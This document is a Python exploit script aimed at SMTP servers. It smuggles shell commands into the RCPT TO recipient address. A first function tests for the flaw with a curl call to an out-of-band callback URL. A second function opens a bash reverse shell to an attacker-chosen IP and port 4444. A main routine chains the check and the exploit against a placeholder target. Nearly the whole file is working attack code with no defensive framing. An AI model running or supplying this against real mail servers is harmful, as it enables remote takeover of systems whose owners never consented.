import socket

def is_port_open(host, port):
    try:
        sock = socket.create_connection((host, port), timeout=10)
        sock.close()
        return True
    except (socket.timeout, ConnectionRefusedError, OSError):
        return False

def smtp_payload_check_vulnerability(host, port, oast):
    try:
        with socket.create_connection((host, port), timeout=10) as conn:
            conn.send(b'EHLO localhost\r\n')
            conn.recv(1024)

            conn.send(b'MAIL FROM: <aaaa@mail.domain.com>\r\n')
            conn.recv(1024)

            rcpt_to_payload = f'RCPT TO: <"aabbb$(curl${{IFS}}{oast})"@mail.domain.com>\r\n'.encode()
            conn.send(rcpt_to_payload)
            conn.recv(1024)

            conn.send(b'DATA\r\n')
            conn.recv(1024)

            conn.send(b'aaa\r\n.\r\n')
            resp = conn.recv(1024)

            conn.send(b'QUIT\r\n')
            return resp.decode('utf-8')

    except Exception as e:
        return f"Error: {str(e)}"

def smtp_payload_exploit_reverse_shell(host, port, local_ip, local_port):
    reverse_shell = f'/bin/bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1'
    try:
        with socket.create_connection((host, port), timeout=10) as conn:
            conn.send(b'EHLO localhost\r\n')
            conn.recv(1024)

            conn.send(b'MAIL FROM: <exploit@mail.domain.com>\r\n')
            conn.recv(1024)

            rcpt_to_payload = f'RCPT TO: <"exploit$(bash -c \'{reverse_shell}\')"@mail.domain.com>\r\n'.encode()
            conn.send(rcpt_to_payload)
            conn.recv(1024)

            conn.send(b'DATA\r\n')
            conn.recv(1024)

            conn.send(b'Exploit in action\r\n.\r\n')
            resp = conn.recv(1024)

            conn.send(b'QUIT\r\n')
            return resp.decode('utf-8')

    except Exception as e:
        return f"Error: {str(e)}"

def main():
    host = "target.domain.com"
    port = 25
    oast = "http://your-oast-url.com"
    local_ip = "your-local-ip"
    local_port = 4444

    if is_port_open(host, port):
        print(f"Port {port} is open on {host}")

        print("Checking for vulnerability...")
        response = smtp_payload_check_vulnerability(host, port, oast)
        print("SMTP Response (Vulnerability Check):\n", response)

        if "message delivered" in response:
            print("Vulnerability detected! Proceeding to exploitation...")

            exploit_response = smtp_payload_exploit_reverse_shell(host, port, local_ip, local_port)
            print("SMTP Response (Exploitation - Reverse Shell):\n", exploit_response)

        else:
            print("No vulnerability detected or unable to exploit.")
    else:
        print(f"Port {port} is closed on {host}")

if __name__ == "__main__":
    main()